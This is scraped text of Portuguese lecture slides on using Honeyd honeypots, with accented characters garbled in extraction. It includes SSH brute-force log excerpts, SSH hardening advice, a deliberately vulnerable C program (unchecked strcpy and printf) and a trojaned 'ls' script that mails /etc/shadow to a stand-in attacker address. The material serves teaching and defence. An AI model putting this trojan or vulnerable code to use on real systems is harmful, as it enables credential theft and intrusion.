01:26:04 golden - laptop sshd [23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2 Dec 24 01:26:05 golden - laptop sshd [23965]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Dec 24 01:26:21 golden - laptop sshd [23975]: Invalid user cvsuser from 89.235.152.18 Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : check pass ; user unknown Dec 24 01:26:21 golden - laptop sshd [23975]: pam_unix ( ssh : auth ) : authentication failure ; logname = uid =0 euid =0 tty = ssh ruser = rhost =89.235.152.18 Dec 24 01:26:22 golden - laptop sshd [23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2 Dec 24 01:26:24 golden - laptop sshd [23977]: reverse mapping checking getaddrinfo for 89 -235 -152 -18. adsl . sta . mcn . ru [89.235.152.18] failed - POSSIBLE BREAK - IN ATTEMPT ! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 60. SSH Defesa: IPTables passwords mais fortes Autentica¸˜o RSA ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 61. SSH password m´ ınimo de 8 caracteres password nao triviais combina¸˜es alfanum´ricas co e mnem´nica: “Um Whiskey-Cola vale 3 euros no BA!” = o “UW-Cv3enBA!” Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 62. SSH http://www.passwordmeter.com/ Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 63. SSH - Autentica¸˜o RSA ca Geramos o par de chaves com o comando “ssh-keygen -t rsa”. 1 De seguida s˜o criados os ficheiros /.ssh/id rsa (chave a privada) e /.ssh/id rsa.pub (chave p´blica) u Em cada m´quina onde nos quisermos ligar (destino), a 2 colocamos a “id rsa.pub” gerada em /.ssh/authorized keys concatenando o conte´do desta forma por exemplo: “cat u id rsa.pub >> /.ssh/authorized keys” Em cada m´quina de onde nos quisermos ligar (origem), a 3 colocamos a “id rsa” em /.ssh/ S´ falta desactivar o login baseado em password ao adicionar o 4 a linha “PasswordAuthentication no” em /etc/ssh/sshd config e de seguida fazer restart ao daemon “sshd” atrav´s de e “/etc/init.d/sshd restart”. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 64. Vulnerabilidades Comportamento n˜o previsto num artefacto de software a Buffer Overflow Input n˜o validado a SQL Injection Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 65. Explora¸˜o de vulnerabilidades ca Exploit ´ E a designa¸˜o dada a um peda¸o de c´digo que serve para ca c o explorar falhas em aplica¸˜es de forma a causarem um co comportamento pr´viamente n˜o antecipado nas mesmas. e a # include < stdio .h > # include < string .h > int main ( int argc , char * argv []) { char buffer [10]; strcpy ( buffer , argv [1]) ; printf ( buffer ) ; return 0; } Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 66. Buffer Overflow user@honeypot :~ $ gcc exploit . c -o exploit user@honeypot :~ $ ./ exploit thisisanexploit *** stack smashing detected ***: ./ exploit terminated thisisanexploitAborted Um dos mecanismos de defesa do gcc Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 67. ShellCode Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o) co o a a desenvolvidas de maneira a que possam ser injectadas numa aplica¸˜o em tempo de execu¸˜o. ca ca Acesso ilegal a espa¸o de mem´ria n˜o autorizado c o a Injec¸˜o do shellcode ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 68. RootKits Conjunto de programas malicionsos (trojans, backdoors chkrootkit e rkhunter (Linux)1 ; RootkitRevealer (Windows). 1 Ambos dispon´ ıveis no gestor de pacotes do Ubuntu. Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 69. Trojaned ls #!/ bin / bash mv / bin / ls / bin / ls . old / bin / echo quot; cat / etc / shadow | mail intruso@intruso . pt quot; > / bin / ls / bin / echo quot;/ bin / ls . old quot; >> / bin / ls chmod + x / bin / ls Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  • 70. Conclus˜o a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

×